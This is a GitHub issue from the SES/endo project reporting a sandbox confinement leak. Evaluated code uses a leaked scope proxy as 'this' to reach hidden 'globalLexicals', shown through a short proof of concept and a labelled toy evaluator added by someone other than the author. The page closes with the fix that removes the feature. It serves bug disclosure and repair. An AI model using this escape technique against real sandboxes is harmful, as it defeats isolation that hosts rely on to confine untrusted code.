Scope proxy leak allows constructive access to global lexicals #904

Closed
mhofman opened this issue Sep 22, 2021 · 1 comment · Fixed by #1343
Labels: confinement (Pertaining to confinement of guest programs.), ses

Comments

mhofman (Contributor) commented Sep 22, 2021

A property of the globalLexicals option of the Compartment constructor is that they can only be accessed lexically, which can be denied to evaluated code by simple code transforms. However, combined with the leak of scope proxy objects (#31), evaluated code can constructively reach the global lexicals.

```js
const c = new Compartment({}, { globalLexicals: { foo() { return 'secret'; } } });
c.evaluate(`
  // An unqualified call resolved through the scope proxy receives the proxy as this.
  globalThis.getThis = function() { return this; };
  // A computed property access on the leaked proxy reaches the lexical without naming it lexically.
  const hiddenFoo = getThis()[['f', 'o', 'o'].join('')];
  hiddenFoo()
`);
```

Unlike #876, this affects all evaluators.
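As an added example (not the issue author's PoC and not SES/endo source), the following toy evaluator models the `with`-based scope layout that the issue and the later commit message refer to, so the mechanism is concrete: an unqualified call resolved through a `with` object receives that object as `this`, and when one object (or one proxy) fronts both the global object and the lexicals, that `this` gives constructive access to the lexicals. The second layout separates the global object from the lexicals, which closes the route shown in the PoC but, as the follow-up comment notes, still leaks the lexicals object to any binding that lives in it (modelled here by the host placing a function in the lexicals object, as a compiled module binding would). The guest strings, the function names `makeGlobalObject`, `makeSingleScopeEvaluator` and `makeLayeredEvaluator`, and the terminator proxy's behaviour are this example's own assumptions, not the project's API.

```javascript
// Added example, not code from SES/endo. Toy model of a with-based evaluator
// reproducing the this-leak described in the issue. All names are this
// example's own, not the project's API.

// Constructed guest code, the same attack shape as the issue's PoC.
const GUEST = `
  globalThis.getThis = function () { return this; };
  const leaked = getThis();
  const hiddenFoo = leaked[['f', 'o', 'o'].join('')];
  typeof hiddenFoo === 'function' ? hiddenFoo() : undefined;
`;

// Constructed guest code for the layered layout: calls a binding that lives in
// the lexicals object itself (as a compiled module binding would).
const MODULE_GUEST = `getThis()[['f', 'o', 'o'].join('')]();`;

// Stand-in for a compartment global: a null-prototype object exposing the real
// eval so that eval(src) below stays a *direct* eval and sees the with scopes.
function makeGlobalObject() {
  const g = Object.create(null);
  g.globalThis = g;
  g.eval = eval;
  return g;
}

// Layout 1: one proxy fronts both the global object and the global lexicals.
// `has` answers true for every name so lookups never reach the host realm.
function makeSingleScopeEvaluator(globalObject, globalLexicals) {
  const hasOwn = (o, k) => Object.prototype.hasOwnProperty.call(o, k);
  const scopeProxy = new Proxy(Object.create(null), {
    has: () => true,
    get: (_t, name) => (hasOwn(globalLexicals, name) ? globalLexicals[name] : globalObject[name]),
    set: (_t, name, value) => { globalObject[name] = value; return true; },
  });
  // Function-constructor bodies are sloppy, so `with` is allowed there; the
  // inner function is strict so `this` in guest code is never coerced.
  const make = new Function('scope',
    'with (scope) { return function (src) { "use strict"; return eval(src); }; }');
  return make(scopeProxy);
}

// Layout 2: separate with layers, reached through `this` because a bare name
// would itself be captured by the outer with. Calls resolved through the global
// object now get the global object as `this`, so the lexicals are out of reach
// from that direction. A call resolved through the lexicals layer still gets the
// lexicals object: the residual leak the issue's follow-up comment describes.
function makeLayeredEvaluator(globalObject, lexicals) {
  const terminator = new Proxy(Object.create(null), {
    has: () => true,       // stop name resolution here ...
    get: () => undefined,  // ... unknown names read as undefined (toy choice)
    set: () => false,      // ... and strict-mode writes to them throw
  });
  const make = new Function(
    'with (this.terminator) { with (this.globalObject) { with (this.lexicals) {' +
    ' return function (src) { "use strict"; return eval(src); }; } } }');
  return make.call({ terminator, globalObject, lexicals });
}

function demoSingleScope() {
  const lexicals = { foo() { return 'secret'; } };
  return makeSingleScopeEvaluator(makeGlobalObject(), lexicals)(GUEST); // 'secret'
}

function demoLayered() {
  const lexicals = { foo() { return 'secret'; } };
  const evaluate = makeLayeredEvaluator(makeGlobalObject(), lexicals);
  const viaGlobal = evaluate(GUEST);                   // undefined: this route is closed
  // Model a module binding compiled into the same lexicals object (host side).
  lexicals.getThis = function () { return this; };
  const viaLexical = evaluate(MODULE_GUEST);           // 'secret': the lexicals object leaks
  return { viaGlobal, viaLexical };
}

console.log(demoSingleScope(), demoLayered());
```

The single-scope layout is what the PoC exploits: the proxy's `get` trap is the only thing standing between the leaked `this` and the lexicals, and it cannot tell a legitimate scope lookup from a property read on the leaked object. The layered layout shows why separating the global object helps only partially, which is the trade-off the fixing commit describes (a further scope layer versus dropping `globalLexicals`).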

@mhofman mhofman added the confinement Pertaining to confinement of guest programs. label Sep 22, 2021
@mhofman mhofman self-assigned this Feb 7, 2022
@mhofman mhofman added the ses label Feb 8, 2022
mhofman (Contributor, Author) commented Oct 26, 2022

Now that #1293 has landed, the global lexical leak can only happen through the lexicals created for module bindings which currently use the same object. #1341 should fix that.

kriskowal added a commit that referenced this issue Oct 26, 2022
Fixes #904

*BREAKING CHANGE*: Removes support for `globalLexicals`.  To our knowledge, there are no production uses for `globalLexicals`.  They currently could leak because `moduleLexicals` and `globalLexicals` used the same scope object, so properties of one would leak to the other with crafted modules.  We had an opportunity to plug the leak at the cost of a fifth scope in all evaluators, but elected to remove the unnecessary complexity instead.
kriskowal added a commit that referenced this issue Oct 27, 2022
kriskowal added a commit that referenced this issue Oct 28, 2022